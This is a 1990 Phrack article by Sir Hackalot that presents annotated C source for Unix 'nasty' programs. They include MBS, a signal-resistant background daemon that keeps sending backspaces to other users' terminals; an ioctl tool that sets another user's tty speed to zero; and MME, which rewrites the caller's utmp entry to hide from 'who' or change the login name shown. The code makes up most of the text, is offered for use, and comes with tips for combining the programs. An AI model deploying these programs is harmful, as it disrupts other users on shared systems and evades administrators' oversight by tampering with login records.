| ==Phrack Classic== |
|
|
| Volume Three, Issue 32, File #5 of 12 |
|
|
|
|
| *%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%* |
| %P P% |
| %H C UNIX `nasties' PART I H% |
| %A by A% |
| %Z Sir Hackalot of PHAZE (10/20/90) Z% |
| %E E% |
| *%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%* |
|
|
|
|
| o Purpose of this file: |
|
|
| The purpose of this file is to share small C programs for the Unix |
| System V and/or BSD 4.3 operating systems which as in logical terms, |
| "Nasty". This "Nasty" can be termed better as Annoyance programs |
| or tricky programs. |
|
|
| The purpose of this text however, is NOT to teach one how to program |
| in C and or how to use the C compiler on Unix systems. This textfile |
| assumes you have a working knowledge of programming with C in the |
| UNIX environment. |
|
|
|
|
|
|
| o The UTMP Reader: |
| ~~~~~~~~~~~~~~~~ |
|
|
| First, I would like to start this text off by posting in a generic |
| /etc/utmp reader. The /etc/utmp reader is essential for applications |
| that deal with all the users online at a given time. |
|
|
| Here is the source: |
|
|
| - - - - - - - - - - - - - - - - - -CUT-HERE- - - - - - - - - - - - - - - - - - |
|
|
|
|
| /* WhatTTY -- Generic WHO |
| UTMP Reader "Skeleton" : By Sir Hackalot / PhaZe |
|
|
| This is basically a skeleton program that is just a base for any UTMP |
| operations. |
|
|
| This is the skeleton that PhaZe(soft) uses for anything that deals |
| with reading the utmp file, such as MBS, SEND, VW, MME, and other |
| utilities. |
|
|
| Applications: You can use this when you need to do something to |
| everyone online, or when you need some sort of data from utmp, wtmp |
| or any file that is like utmp. |
| */ |
|
|
| #include <stdio.h> |
| #include <sys/types.h> /* This is the key to the whole thing */ |
| #include <utmp.h> |
| #include <fcntl.h> |
|
|
|
|
| main() |
| { |
| int handle; |
| char *etc = "/etc/utmp"; |
| struct utmp user; |
|
|
| handle = open(etc,O_RDONLY); |
|
|
| while(read(handle,&user,sizeof(user)) != 0) { |
| if (user.ut_type == USER_PROCESS) |
| printf("%s is on %s\n",user.ut_name,user.ut_line); |
| } |
| close(handle); |
|
|
| /* Simple, Right? */ |
| /* To see anything that is waiting for a login, change USER_PROCESS |
| to LOGIN_PROCESS */ |
| } |
|
|
| - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - |
|
|
| In the above program, this is what happens: |
| 1. I assigned the variable "etc" to point at the string |
| "/etc/utmp", which is the utmp file. |
| 2. I opened in in Read ONLY mode (O_RDONLY). |
| 3. I started a loop that does not end until 0 bytes are |
| read into the user structure. The 0 bytes would mean |
| end of file. |
|
|
| Notice the line: |
| if (user.ut_type == USER_PROCESS) |
|
|
| What the above line does is to distinguish between a user |
| and a terminal waiting for a Login. The ut_type is defined |
| in utmp.h. There are many types. One of them is LOGIN_PROCESS. |
| That will be a terminal waiting for a login. If you wanted to see |
| all the TTYs waiting to be logged in on, you would change the |
| USER_PROCESS to LOGIN_PROCESS. Other types are things like |
| INIT_PROCESS. You can just look in utmp.h to see them. |
|
|
| Also notice that I have inclide "sys/types.h". If you do not include |
| this file, there will be an error in utmp.h, and other headers. |
| types.h has definitions for other TYPES of data, etc. So, if in |
| a header file you encounter a syntax error, you might need to include |
| sys/types.h |
|
|
| This program is just a skeleton, although it does print out who |
| is logged on, and to what TTY they are on. You will see how this |
| skeleton I wrote can be used. I used it to write MBS. |
|
|
| _______________________________________________________________________________ |
|
|
|
|
| o MBS -- Mass BackSpace virus: |
| ~~~~~~~~~~~~~~~~~~~~~~~~~~~~ |
|
|
| MBS may not be considered a virus, since it does not replicate |
| itself. However, it does "infect" every user that logs in, provided |
| the conditions are right. |
|
|
| The MBS virus uses the utmp reader to constantly read the utmp |
| file to find its next victim. Thus, eventually getting everyone, then |
| recycling to start again. Therefore catching people who login after |
| it is started. |
|
|
| Lets look at the source: |
|
|
| - - - - - - - - - - - - - - - - - -CUT-HERE- - - - - - - - - - - - - - - - - - |
|
|
| #include <stdio.h> |
| #include <sys/types.h> |
| #include <utmp.h> |
| #include <fcntl.h> |
| #include <signal.h> |
| /* |
| MBS - Mass BackSpace Virus!! v2.2 Deluxe+ |
| (c) 1990 - Sir Hackalot |
| PhaZeSOFT Ltd. |
|
|
| */ |
|
|
| char *ent[10][100]; /* This supports 10 immune people change 10 to x for more */ |
| int maxitem = 5; /* Should be total # of immune dudes */ |
| int truefalse = 0; |
| int warn[10],bad; |
| char full_tty[15], text[160], kstr[80]; |
| FILE *to_tty, *strm; |
| struct utmp u; |
|
|
|
|
| void kmes(fmt,boo) |
| char *fmt; |
| int boo; |
| { |
| if (boo != 0) { |
| printf("MBS_KERN: "); |
| printf("%s",fmt); |
| } |
| if (boo == 0) { |
| sprintf(full_tty,"/dev/%s",u.ut_line); |
| to_tty = fopen(full_tty,"w"); |
| fprintf(to_tty,"MBS_KERN: %s",fmt); |
| fclose(to_tty); |
| } |
| } |
|
|
| void initit() { /* Initialize our little "kernel" */ |
| int xxx = 0; |
| strcpy(ent[0],"technic"); |
| strcpy(ent[1],"merlin"); |
| strcpy(ent[2],"datawiz"); |
| strcpy(ent[3],"par"); |
| strcpy(ent[4],"Epsilon"); |
| while (xxx < 11) { |
| warn[xxx] = 0; |
| xxx++; |
| } |
| kmes("Kernel Started.\n",1); |
| } |
|
|
| void warnem(wcnt) /* Notify all the immune people ... */ |
| int wcnt; |
| { |
| if (bad == 0) { /* keep from dumping core to disk */ |
| if (warn[wcnt] < 2) { |
| sprintf(kstr,"%s has started a backspace virus!\n",getlo |
| kmes(kstr,0); |
| warn[wcnt]++; |
| } |
| } |
| } |
|
|
|
|
| int checkent(uname) /* Check for immunity */ |
| char *uname; |
| { |
| int cnt = 0; |
| truefalse = 0; /* assume NOT immune */ |
| while (cnt < maxitem) { |
| if (strcmp(uname,ent[cnt]) == 0) { /* if immune... */ |
| truefalse = 1; |
| warn[cnt]++; /* increment warning variable */ |
| warnem(cnt); /* warn him if we have not */ |
| } |
|
|
| cnt++; |
| } |
| return(truefalse); /* return immunity stat. 1=immune, 0 = not */ |
| } |
|
|
|
|
| /* Purpose: Instead of just ignoring the signal via SIG_IGN, we want |
| to intercept it, and notify use */ |
| void sig_hand(sig) |
| int sig; |
| { |
| if(sig == 3) kmes("Ignoring Interrupt\n",1); |
| if(sig == 15) kmes("Ignoring Termination Signal\n",1); |
| if(sig == 4) kmes("Ignoring quit signal.\n",1); |
| } |
|
|
| main(argc,argv) |
| int argc; |
| char *argv[]; |
|
|
| { |
| int prio,pid,isg,handle; |
| char buf[80]; |
| char name[20],tty[20],time[20]; |
| initit(); |
| if (argc < 2) prio = 20; |
| if (argc == 2) prio = atoi(argv[1]); |
| if ((pid = fork()) > 0) { |
| printf("Welcome to MBS 2.2 Deluxe, By Sir Hackalot [PHAZE]\n"); |
| printf("Another Fine PhaZeSOFT production\n"); |
| printf("Thanks to The DataWizard for Testing this\n"); |
| printf("Hello to The Conflict\n"); |
| sprintf(kstr,"Created Process %s (%d)\n\n",argv[0],pid); |
| kmes(kstr,1); |
| exit(0); /* KILL MOTHER PID, return to Shell & go background */ |
| } |
| nice(prio); |
| signal(SIGQUIT,sig_hand); |
| signal(SIGINT,sig_hand); |
| signal(SIGTERM,sig_hand); |
| /* That makes sure you HAVE to do a -9 or -10 to kill this thing. |
| Sometimes, hitting control-c will kill of background processes! |
| Add this line if you want it to continue after you hangup: |
| signal(SIGHUP,SIG_IGN); |
| doing it will have the same effect as using NOHUP to |
| to execute it. Get it? Nohup = no SIGHUP |
| */ |
| while(1) { /* "Kernel" Begins here and never ends */ |
| handle = open("/etc/utmp",O_RDONLY); |
| while (read(handle,&u,sizeof(u)) != 0) { |
| bad = 0; |
| sprintf(full_tty,"/dev/%s",u.ut_line); |
| if (strcmp(u.ut_name,getlogin()) != 0) { |
|
|
| /* Fix: Below is a line that optimizes the hosing/immune process |
| It skips the utmp entry if it is not a user. If it is, it |
| checks for immunity, then comes back. This is alot faster |
| and does not wear down cpu time/power */ |
|
|
| if (u.ut_type == USER_PROCESS) isg = checkent(u.ut_name); |
| else isg = 1; |
| if (isg != 1) { |
| if((to_tty = fopen(full_tty,"w")) == NUL |
| bad = 1; |
| } |
| if (bad == 0) { |
| fprintf (to_tty, "\b\b\b"); |
| fflush (to_tty); |
| } |
| fclose(to_tty); |
| } |
| } |
| } |
| close (handle); |
| } |
| } |
|
|
| - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - |
|
|
| I am going to try to take this bit by bit and explain how it works |
| so that maybe you can come up with some good ideas on creating |
| something similar. |
|
|
| I will start with the MAIN function. Here it is: |
|
|
| ___ |
|
|
| main(argc,argv) |
| int argc; |
| char *argv[]; |
|
|
| { |
| int prio,pid,isg,handle; |
| char buf[80]; |
| char name[20],tty[20],time[20]; |
| initit(); |
| ___ |
|
|
| Obviously, this is the part of the code which initializes the main |
| variables used. The "main(argc,argv)" is there so it can accept |
| command line parameters. The command line parameters are just |
| for speed customization, which I will discuss later. Notice how |
| the variables are defined for the command line parameters: |
|
|
| int argc, char *argv[]; |
|
|
| argc is the number of arguments, INCLUDING the name of the current |
| executable running. argv[] holds the strings in an array which make |
| up the parameters passed. argv[0] holds the name of the program, |
| while argv[1] holds the 1st parameter entered on the command line. |
| initit() is called to set up the necessary tables. All of |
| the variables defined at the top of the program are global, and alot |
| of these functions use the global variables, as does initit();. |
|
|
| ___ |
|
|
| if (argc < 2) prio = 20; |
| if (argc == 2) prio = atoi(argv[1]); |
| ___ |
|
|
| Ok, the above two lines essentially parse the command line. |
| The MBS program only accepts ONE argument, which is the priority |
| value to add to the normal process priority. This is so you |
| can customize how fast MBS runs. If you want to burn CPU time, |
| you would invoke mbs by: |
| $ mbs 0 |
|
|
| That would make the priority as fast as the current can run something. |
| MBS's default priority setting is 20, so that CPU time will be saved. |
| MBS is very fast however, and since alot of Unix systems like to |
| cache alot of frequently used data from disks, it gets fast after |
| it reads utmp a few times, since utmp will be cached until it changes. |
| However, you can run MBS with a number from 0-19, the higher the |
| number, the "less" priority it will have with the cpu. |
|
|
|
|
| ___ |
|
|
| if ((pid = fork()) > 0) { |
| printf("Welcome to MBS 2.2 Deluxe, By Sir Hackalot [PHAZE]\n"); |
| printf("Another Fine PhaZeSOFT production\n"); |
| sprintf(kstr,"Created Process %s (%d)\n\n",argv[0],pid); |
| kmes(kstr,1); |
| exit(0); /* KILL MOTHER PID, return to Shell & go background */ |
| } |
|
|
| ___ |
|
|
| The above is what sends MBS into the background. It calls fork(), |
| which creates another process off the old one. However, fork() |
| can be considered "cloning" a process, since it will use anything |
| beneath it. So, now you can assume there are TWO copies of MBS |
| running -- One in the foreground, and one in the background. However, |
| you may notice the exit(0). That first exit kills off the parent. |
| a second call to exit() would kill the child as well. notice the |
| call to "kmes". kmes is just a function that is defined earlier, |
| which I will discuss later. |
| ___ |
|
|
| nice(prio); |
| signal(SIGQUIT,sig_hand); |
| signal(SIGINT,sig_hand); |
| signal(SIGTERM,sig_hand); |
| /* signal(SIGHUP,SIG_IGN); */ |
| ___ |
|
|
| The above code is integral for the survival of the MBS program in |
| memory. The nice(prio) is what sets the new priority determined |
| by the command line parsing. |
|
|
| The signal() statements are basically what keeps MBS running. What |
| it does is catch INTERRUPTS, Quits, and a regular call to KILL. |
| the commented out portion would ignore requests to kill upon hangup. |
| This would keep MBS in the background after you logged off. |
|
|
| Why do this? Well, remember that the parent was affected by |
| its environment? Well, the new forked process is too. That means, |
| if you were 'cat'ting a file, and hit control-C to stop it, the |
| cat process would stop, but push the signal on to MBS, which would |
| cause MBS to exit, if it did not have a signal handler. The signal |
| calls setup signal handlers. What they do is tell the program |
| to goto the function sig_hand() when one of the 3 signals is |
| encountered. The commented signal just tells the program to ignore |
| the hangup signal. The sig_hand argument can be replaced with |
| SIG_IGN if you just want to plain ignore the signal and not handle it. |
|
|
| The SIGQUIT is sometimes the control-D character. That is why it |
| also must be dealt with. If the signals aren't ignored or caught, |
| MBS can easily kicked out of memory by YOU, by accident of course. |
|
|
| ___ |
|
|
| while(1) { /* "Kernel" Begins here and never ends */ |
| handle = open("/etc/utmp",O_RDONLY); |
| ___ |
|
|
| The above starts the main loop. The begining of the loop is to open |
| the utmp file. |
|
|
| ___ |
|
|
| while (read(handle,&u,sizeof(u)) != 0) { |
| bad = 0; |
| sprintf(full_tty,"/dev/%s",u.ut_line); |
| if (strcmp(u.ut_name,getlogin()) != 0) { |
| if (u.ut_type == USER_PROCESS) isg = checkent(u.ut_name); |
| else isg = 1; |
| if (isg != 1) { |
| if((to_tty = fopen(full_tty,"w")) == NULL) { |
| bad = 1; |
| } |
| if (bad == 0) { |
| fprintf (to_tty, "\b\b\b"); |
| fflush (to_tty); |
| } |
| fclose(to_tty); |
| } |
| } |
| ___ |
|
|
|
|
| Above is the sub_main loop. what it does is go through the utmp |
| file, and on each entry, it prepares a path name to the TTY |
| of the current utmp entry (sprintf(fulltty...)). Then it checks |
| to see if it is YOU. If it is, the loop ends. If it is not, then |
| it sees if it is a User. If not, it ends the loop and goes to |
| the next. |
|
|
| If it is a user, it goes to checkent to see if that user has been |
| declared immune in the immunity tables (down below later..). |
| If the idiot is not immune, it attempts to open their tty. If it |
| cannot, it sets the bad flag, then ends the loop. If it can be |
| written to, it sends three backspaces, according to YOUR tty specs. |
| Then, it closes the opened tty, and the loop continues until the end. |
|
|
| ___ |
|
|
| } |
| close (handle); |
| } |
| } |
|
|
| ___ |
|
|
| The above is the end of the main loop. It closes handle (utmp) so |
| it can be reopened at the start of the loop at the beginning of the |
| file. The reason to not create a table of people to hit in memory |
| after one reading is so that MBS will stop after people logoff, and |
| to start when new ones logon. The constant reading of the utmp |
| file makes sure everyone gets hit, except immune people. Also, |
| the file must be closed before reopening, or else, after a few opens, |
| things will go to hell. |
|
|
|
|
| Here is the signal handler: |
|
|
| ___ |
|
|
| void sig_hand(sig) |
| int sig; |
| { |
| if(sig == 3) kmes("Ignoring Interrupt\n",1); |
| if(sig == 15) kmes("Ignoring Termination Signal\n",1); |
| if(sig == 4) kmes("Ignoring quit signal.\n",1); |
| } |
| ___ |
|
|
| It is very simple. when a signal is caught and sent to the handler, |
| the library function SIGNAL sends the signal number as an argument |
| to the function. The ones handled here are 3,4, and 15. But |
| this was just for effect. You could just have it print one line |
| no matter what the signal was, or just rip this function out and |
| put in SIG_IGN in the signal calls. |
|
|
| Below is the immunity check: |
| ___ |
|
|
| int checkent(uname) /* Check for immunity */ |
| char *uname; |
| { |
| int cnt = 0; |
| truefalse = 0; /* assume NOT immune */ |
| while (cnt < maxitem) { |
| if (strcmp(uname,ent[cnt]) == 0) { /* if immune... */ |
| truefalse = 1; |
| warn[cnt]++; /* increment warning variable */ |
| warnem(cnt); /* warn him if we have not */ |
| } |
|
|
| cnt++; |
| } |
| return(truefalse); /* return immunity stat. 1=immune, 0 = not */ |
| } |
|
|
| ___ |
|
|
| Above, you see variables used that are not defined. They are |
| just variables that were declared as globals at the begining. |
| What this does is just compare the login name sent to it with |
| every name in the immunity table. If it finds the name on |
| the table matches, it will go and see if it should warn the |
| user. Also, the warn count is incremented so that the warning |
| function will know if the user has been warned. |
|
|
| Here is the warning function: |
|
|
| ___ |
|
|
| void warnem(wcnt) /* Notify all the immune people ... */ |
| int wcnt; |
| { |
| if (bad == 0) { /* keep from dumping core to disk */ |
| if (warn[wcnt] < 2) { |
| sprintf(kstr,"%s has started a backspace virus!\n",getlo |
| kmes(kstr,0); |
| warn[wcnt]++; |
| } |
| } |
| } |
| ___ |
|
|
| What this does is take the position number of the table entry and |
| checks and see if that entry has been warned before. It decides |
| this by checking its value. If it is less than two, that means |
| the user had not been warned. After it is sent, the function |
| incrememnts the warning flag so that they will never been warned |
| again until the program has stopped & restarted or someone else |
| runs one. The "if (bad == 0)" is there so that it only warns a |
| person if it can write to the tty. |
|
|
| Here is the kmes function you keep seeing: |
|
|
| ___ |
|
|
| void kmes(fmt,boo) |
| char *fmt; |
| int boo; |
| { |
| if (boo != 0) { |
| printf("MBS_KERN: "); |
| printf("%s",fmt); |
| } |
| if (boo == 0) { |
| sprintf(full_tty,"/dev/%s",u.ut_line); |
| to_tty = fopen(full_tty,"w"); |
| fprintf(to_tty,"MBS_KERN: %s",fmt); |
| fclose(to_tty); |
| } |
| } |
| ___ |
| All this is, is a fancy printf which prints a string with |
| "MBS_KERN:" stuck on the front of it. the BOO variable is just |
| so it can determine whether or not to send it to the local |
| screen or to another tty. It is just for looks. |
|
|
| Now, finally, we can look at the initializer: |
|
|
| ___ |
|
|
| void initit() { /* Initialize our little "kernel" */ |
| int xxx = 0; |
| strcpy(ent[0],"sirh"); |
| strcpy(ent[1],"merlin"); |
| strcpy(ent[2],"datawiz"); |
| strcpy(ent[3],"par"); |
| strcpy(ent[4],"epsilon"); |
| while (xxx < 11) { |
| warn[xxx] = 0; |
| xxx++; |
| } |
| kmes("Kernel Started.\n",1); |
| } |
| ___ |
|
|
| This is a very SIMPLE procedure. It just fills the list |
| with the people to keep immune. ent[..][..] is what holds |
| the immune list. It also zeros out the warning flags associated |
| with each user. ("sirh","merlin","par",etc. are acct. names) |
|
|
| This "virus" can do more than just send backspaces if you want it |
| to, but it will take modification. Some people have modified |
| it to include the next program, which is ioctl.c. |
|
|
| _______________________________________________________________________________ |
|
|
|
|
|
|
| o IOCTL -- Set another's tty w/out read perms |
| ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ |
|
|
| The program ioctl is very very nice. What it does is basically |
| act like stty, but you don't have to use the < to change |
| someone else's terminal. Here is the listing: |
|
|
| - - - - - - - - - - - - - - - - - -CUT-HERE- - - - - - - - - - - - - - - - - - |
|
|
| #include <stdio.h> |
| #include <sys/types.h> |
| #include <fcntl.h> |
| #include <sgtty.h> |
| #define TIOC ('T'<<8) |
| #define TCSETA (TIOC|2) |
|
|
| main(argc,argv) |
| int argc; |
| char *argv[]; |
| { |
| int x; |
| struct sgttyb histty; |
| if (argc == 1) exit(0); |
| x = open(argv[1],O_WRONLY); |
| if (x == -1) exit(0); |
| histty.sg_ispeed = B0; |
| histty.sg_ospeed = B0; |
| ioctl(x,TCSETA,&histty); |
| } |
|
|
| - - - - - - - - - - - - - - - - - -CUT-HERE- - - - - - - - - - - - - - - - - - |
|
|
| The basis of the program is that you give a full path to the tty |
| to nail. You need to be able to write to the tty for it to work. |
|
|
| Notice the two defines. They are in there so you do not have |
| to include termio.h, and hence get 200 warnings of redefinition. |
| This program is WAY simpler than MBS, but here is how it works: |
|
|
| ___ |
|
|
| main(argc,argv) |
| int argc; |
| char *argv[]; |
| ___ |
|
|
| Of course, the above sets up the program to get command line |
| arguments. |
|
|
| ___ |
|
|
| int x; |
| struct sgttyb histty; |
| ___ |
|
|
| These are the variables. the sgttyb structure is what the ioctl |
| function call needs to do its duty. You can do a lot to a tty |
| using the structure, but this program only does 2 things to the |
| tty, as you shall soon see. Remember that the programs here can |
| be modified, especially this one. Just check out sgtty.h to |
| see the modes you can pop a tty into. |
|
|
| ___ |
|
|
| if (argc == 1) exit(0); |
| x = open(argv[1],O_WRONLY); |
| if (x == -1) exit(0); |
| ___ |
|
|
| The above three lines are the open/error checks. The 1st line |
| says that if the idiot did not give an argument then exit |
| the program. The argument needs to be the path to the |
| device driver (/dev/tty...). |
| The second line opens the tty for writing, and the third exits |
| upon error. |
|
|
| ___ |
|
|
| histty.sg_ispeed = B0; |
| histty.sg_ospeed = B0; |
| ioctl(x,TCSETA,&histty); |
| ___ |
|
|
| The above three lines are the meat of the program. What they |
| do is this: |
|
|
| Line 1 sets the input speed to 0 for the tty into the structure. |
| line 2 sets the output speed to 0 for the tty into the structure. |
| line 3 sets the tty according to the structure histty. |
|
|
| That is why if you look into the components of the structure, you can |
| do things, such as convert all output to uppercase for them, |
| set a higher baud, redefine CR mapping, redefine tabs, and |
| all sorts of things. |
|
|
| _______________________________________________________________________________ |
|
|
|
|
| o MME - Make ME!: |
| ~~~~~~~~~~~~~~~ |
| MME is just a program which changes utmp for you, in order to hide |
| you, or just mess with other user's minds. This is a different |
| version then the one I originally put out. In this version, |
| I removed the code that lets you change your tty. It just became |
| too dangerous to change your tty. |
|
|
| Here is the listing: |
|
|
| - - - - - - - - - - - - - - - - - -CUT-HERE- - - - - - - - - - - - - - - - - - |
|
|
| #include <stdio.h> |
| #include <fcntl.h> |
| #include <sys/types.h> |
| #include <utmp.h> |
| #include <sys/stat.h> |
|
|
| char *mytty; /* For an exact match of ut_line */ |
| char *backup_utmp = "cp /etc/utmp /tmp/utmp.bak"; |
| struct utmp *user; |
|
|
| main(argc,argv) |
| int argc; |
| char *argv[]; |
| { |
| int good= 0,cnt = 0,start = 1, index = 0; |
| char err[80]; |
| system(backup_utmp); |
| printf("Welcome to MME 1.00 By Sir Hackalot\n"); |
| printf("Another PHAZESOFT Production\n"); |
| printf("Status:"); |
| if (argc == 2) printf("Changing your login to %s\n",argv[1]); |
| if (argc == 1) printf("Removing you from utmp\n"); |
|
|
| utmpname("/etc/utmp"); |
| mytty = strrchr(ttyname(0),'/'); /* Goto the last "/" */ |
| strcpy(mytty,++mytty); /* Make a string starting one pos greater */ |
| while (good != 1) { |
| user = getutent(); |
| cnt++; |
| if (strcmp(user->ut_line,mytty) == 0) good =1; |
| } |
| utmpname("/etc/utmp"); /* Reset file pointer */ |
| for(start = 0;start < cnt;start++) { |
| user = getutent(); /* Move the file pointer to where we are */ |
| } |
|
|
|
|
| if (argc == 1) { |
| user->ut_type = LOGIN_PROCESS; |
| strcpy(user->ut_name,"LOGIN"); |
| } |
| else user->ut_type = USER_PROCESS; |
|
|
| if (argc == 2) strcpy(user->ut_name,argv[1]); |
| pututline(user); /* Rewrite our new info */ |
| endutent(); /* Tell the utmp functions we are through */ |
| printf("Delete /tmp/utmp.bak if all is well.\n"); |
| printf("Else, copy it to /etc/utmp.\n"); |
| } |
|
|
| - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - |
|
|
|
|
| Well, of course, we will take this bit by bit. |
| Lets start with the standard ole function: |
|
|
| ___ |
|
|
| main(argc,argv) |
| int argc; |
| char *argv[]; |
| ___ |
|
|
| This again sets up main so we can accept command line arguments. |
|
|
| ___ |
|
|
| char *mytty; /* For an exact match of ut_line */ |
| char *backup_utmp = "cp /etc/utmp /tmp/utmp.bak"; |
| struct utmp *user; |
| ___ |
|
|
| These are just global variables. |
| Backup_utmp is the command we will issue to shell for a failsafe |
| mechanism. |
|
|
| ___ |
|
|
| system(backup_utmp); |
| printf("Welcome to MME 1.00 By Sir Hackalot\n"); |
| printf("Another PHAZESOFT Production\n"); |
| printf("Status:"); |
| if (argc >= 2) printf("Changing your login to %s\n",argv[1]); |
| if (argc == 1) printf("Removing you from utmp\n"); |
| ___ |
|
|
| The above is not hard to figure out. First, this uses the system |
| command to load shell, and execute our backup command. |
| Then, the lame credits are printed. Then, it tells you what it |
| is going to do based on the number of arguments passed from the |
| command line. |
| If no arguments are given (argc==1) then remove us from utmp. |
| If there are 1 or more (arc>=2) then change the login name. |
|
|
| ___ |
|
|
| utmpname("/etc/utmp"); |
| mytty = strrchr(ttyname(0),'/'); /* Goto the last "/" */ |
| strcpy(mytty,++mytty); /* Make a string starting one pos greater */ |
| ___ |
|
|
| The above code does the following: utmpname is a system function |
| common to UNIX system V, XENIX system V, etc. It is part of the |
| utmp reading library. It sets the thing to be read when the |
| other system calls are made (getutent, etc..). |
| mytty is set to hold one's tty. It has to break down the result |
| of ttyname(0) to get a ttyname without a path. |
|
|
| ___ |
|
|
| while (good != 1) { |
| user = getutent(); |
| cnt++; |
| if (strcmp(user->ut_line,mytty) == 0) good =1; |
| } |
| ___ |
|
|
|
|
| This code gets your relative index from utmp and stores it into |
| cnt. |
|
|
| ___ |
|
|
| utmpname("/etc/utmp"); /* Reset file pointer */ |
| for(start = 0;start < cnt;start++) { |
| user = getutent(); /* Move the file pointer to where we are */ |
| } |
| ___ |
|
|
| The above resets the file pointer used by the system calls, then |
| moves to your entry. |
|
|
| ___ |
|
|
| if (argc == 1) { |
| user->ut_type = LOGIN_PROCESS; |
| strcpy(user->ut_name,"LOGIN"); |
| } |
| else user->ut_type = USER_PROCESS; |
|
|
| if (argc == 2) strcpy(user->ut_name,argv[1]); |
| pututline(user); /* Rewrite our new info */ |
| endutent(); /* Tell the utmp functions we are through */ |
| ___ |
|
|
| The above is very simple as well. If you are removing yourself |
| from utmp, it will change your process type to LOGIN_PROCESS |
| so that when someone does a "who", you are not there. |
| It changes your login name to LOGIN so if some knowitall |
| system admin does a who -l, he wont see you. See, who -l shows |
| ttys waiting for login. SO, if i did not change your tty name, |
| we would see: |
|
|
| $ who -l |
| LOGIN ttyxx1 |
| LOGIN tty002 |
| joehack tty003 |
| LOGIN tty004 |
|
|
| See the problem there? That is why your name needs to be |
| changed to LOGIN. |
| If you are changing your login name, the "else" statment kicks |
| in and makes SURE you WILL show up in utmp, in case you had |
| removed yourself before. |
| Then, it takes the command line argument, and places it as your |
| login name in utmp. |
| pututline(user) then writes the info into the record where the |
| file pointer is... and that is your record. It puts the contents |
| of the things in the "user" structure into the file. then, endutent |
| closes the file. |
|
|
| Now, here is an example of using the file: |
|
|
| # mme Gh0d |
|
|
| that would change your login name to Gh0d in utmp. |
|
|
| # mme |
|
|
| that would remove you from sight. Remember!!: You need write perms |
| to utmp for this to work. You CAN test this program by changing |
| the filename in the function "utmpname" to somewhere else, say in |
| /tmp. You could copy /etc/utmp to /tmp/utmp, and test it there. |
| Then, you could use "who" to read the file in /tmp to show the |
| results. |
|
|
| _______________________________________________________________________________ |
|
|
|
|
| o In Conclusion: |
| ~~~~~~~~~~~~~~ |
|
|
| These are just some of the programs I decided to put in this file. |
| I have a lot more, but I decided I would keep them for later |
| issues, and leave these two together since they can |
| be easily related. One person took MBS, and ioctl, and mended |
| them together to make a program that sets everyone's baud |
| rate to zero instead of sending 3 backspaces. They just put |
| in the above lines of code into the place where they sent |
| the backspaces, and used open instead of stream open (fopen). |
| It is very simple to mend these two things together. |
|
|
| Have a nice life! Keep on programmin'! |
|
|
| By: Sir Hackalot of Phaze. |
| _______________________________________________________________________________ |
|
|